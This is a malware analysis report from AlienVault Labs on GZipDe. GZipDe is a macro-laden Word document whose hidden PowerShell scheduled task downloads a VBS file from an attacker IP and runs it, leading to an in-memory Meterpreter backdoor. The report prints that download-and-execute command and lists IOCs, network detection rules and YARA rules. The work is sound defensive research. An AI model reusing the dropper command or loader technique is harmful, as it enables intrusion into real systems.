At the end of May a Middle Eastern news network published an article about the next Shanghai Cooperation Organization Summit. A week ago, AlienVault Labs detected a new malicious document targeting the area. It uses a piece of text taken from the report as a decoy:
This is the first step of a multistage infection in which several servers and artifacts are involved. Although the final goal seems to be the installation of a Metasploit backdoor, we found an interesting .NET downloader which uses a custom encryption method to obfuscate process memory and evade antivirus detection.
Malicious Document
The file, which was uploaded to VirusTotal by a user in Afghanistan, contains macro malware embedded in a MS Office Word document (.doc). When opened, it executes a Visual Basic script stored as a hexadecimal stream, and executes a new task in a hidden Powershell console:
'C:WindowsSystem32schtasks.exe' /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR 'Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\'http://118.193.251[.]137/dropbox/?p=BT67HU78HZ\',\'$env:publicsvchost325.vbs\');(New-Object -com Shell.Application).ShellExecute(\'$env:publicsvchost325.vbs\');' /F
Leveraging an HTTP request, it resolves to the following URL:
http://118.193.251[.]137/dropbox/?p=BT67HU78HZ
We are missing the next step of the infection chain as the server is now offline.
Based on the common path we believe this file is related, and may be part of the later infection steps: http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe.
GZipDe - The Encrypted Downloader
The internal name of this malware is Gzipde, as specified by the path it was built on the attacker’s machine:
DocumentsVisual Studio 2008ProjectsgzipdegzipdeobjDebuggzipde.pdb
We found the original reverse-tcp payload publicly available on GitHub, although the attacker added an additional layer of encryption payload to that version. It consists of a Base64 string, named GZipDe, which is zip-compressed and custom-encrypted with a symmetric key algorithm, likely to avoid antivirus detection.
The key is described as an array of bytes, with the values:
After decompression, it passes through a decryptor. The encryption method used is RC4 with a key length of 23 bytes.
The malware allocates a new memory page with execute, read and write privileges. Then it copies the contents of the decrypted payload and launches a new thread to execute it.
The script uses WaitForSingleObject C# class, meaning that the program accesses a mutex object. A special handler controls the access of the process to system resources. This prevents multiple instances of the same malware to run at a time, unnecessarily increasing resource usage and producing more network noise.
The payload contains shellcode that contacts the server at 175.194.42[.]8. Whilst the server isn’t up, Shodan recorded it serving a Metasploit payload:
Metasploit is becoming a popular choice with targeted attacks.
The Metasploit payload
The server, 175.194.42[.]8, delivers a Metasploit payload. It contains shellcode to bypass system detection (since it looks to have a valid DOS header) and a Meterpreter payload - a capable backdoor. For example, it can gather information from the system and contact the command and control server to receive further commands.
This shellcode loads the entire DLL into memory, so it’s able to operate while writing no information into the disk. This operation is called Reflective DLL injection. From this point, the attacker can transmit any other payload in order to acquire elevated privileges and move within the local network.
Thanks to Chris Doman and Jaime Blasco for collaboration.
Appendix
File-Hashes
IP Addresses
118.193.251[.]137
175.194.42[.]8
URLs
http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe
http://118.193.251[.]137/dropbox/?p=BT67HU78HZ
Network Detection
Multi-purpose:
AV ATTACK_RESPONSE Metasploit Reverse Shell Verification (Echo)
ET ATTACK_RESPONSE Metasploit/Meterpreter - Sending metsrv.dll to Compromised Host
ET ATTACK_RESPONSE Metasploit Meterpreter Reverse HTTPS certificate
Dedicated:
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN GZipDe MacroMalware CnC Checkin"; flow:established,to_server; content:"/dropbox/?p="; http_uri; depth:12; content:!"User-Agent|3a| "; http_header; content:!"Referer"; http_header; pcre:"^//dropbox/?p=[a-zA-Z0-9]*$/U"; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;)
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN GZipDe MacroMalware Payload Request"; flow:established,to_server; content:"/dropbox/file"; depth:13; http_uri; content:".exe"; http_uri; distance:0; isdataat:!1,relative; content:!"User-Agent|3a| "; http_header; content:!"Referer"; http_header; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;)
Unified Security Management (USM) Correlation Rules
- System Compromise - Code Execution - Powershell Process Created by Office Word
- Delivery & Attack - Suspicious Download - File Download via Office Macro
- Environmental Awareness - Code Execution - Suspicious PowerShell Arguments
OTX Pulse
Yara Rule
rule gzipde_hunt { meta: author = "AlienVault Labs" description = "Hunt rule to identify files related to Gzipde" copyright = "Alienvault Inc. 2018" reference = "https://otx.alienvault.com/pulse/5b239254174e5d5edab34e05" strings: $a = "118.193.251.137" nocase wide ascii $b = "BT67HU78HZ" nocase wide ascii $c = "2E0EB747-BE46-441A-A8B1-97AB27B49EC5" nocase wide ascii $d = "gzipde.pdb" nocase wide ascii $e = "C:\Users\jhon\Documents\Visual Studio 2008" nocase wide ascii condition: any of them } import "dotnet" rule MeterpreterEncryptedPayloadDotNetGzipDE { meta: type = "malware" description = "GZipDe" author = "jblasco@alienvault.com" reference1 = "https://github.com/DamonMohammadbagher/NativePayload_Reverse_tcp/blob/master/NativePayload_Reverse_tcp.cs" reference2= "https://otx.alienvault.com/indicator/file/33c03d94f75698fac6a39a5a6c328c2be4a079717520e0ec411597b9ca3a9bef" strings: $pdb = "gzipde.pdb" $st1 = "PAGE_EXECUTE_READWRITE" $st2 = "EncryptInitalize" $st3 = "EncryptOutput" $st4 = "CreateThread" $st5 = "VirtualAlloc" condition: uint16(0) == 0x5A4D and ((dotnet.typelib == "c1181bc0-0102-44e9-82ba-7c1ca7d24219" and dotnet.guids[0] == "2e0eb747-be46-441a-a8b1-97ab27b49ec5") or $pdb or (dotnet.number_of_modulerefs == 1 and dotnet.modulerefs[0] == "kernel32" and all of ($st*))) }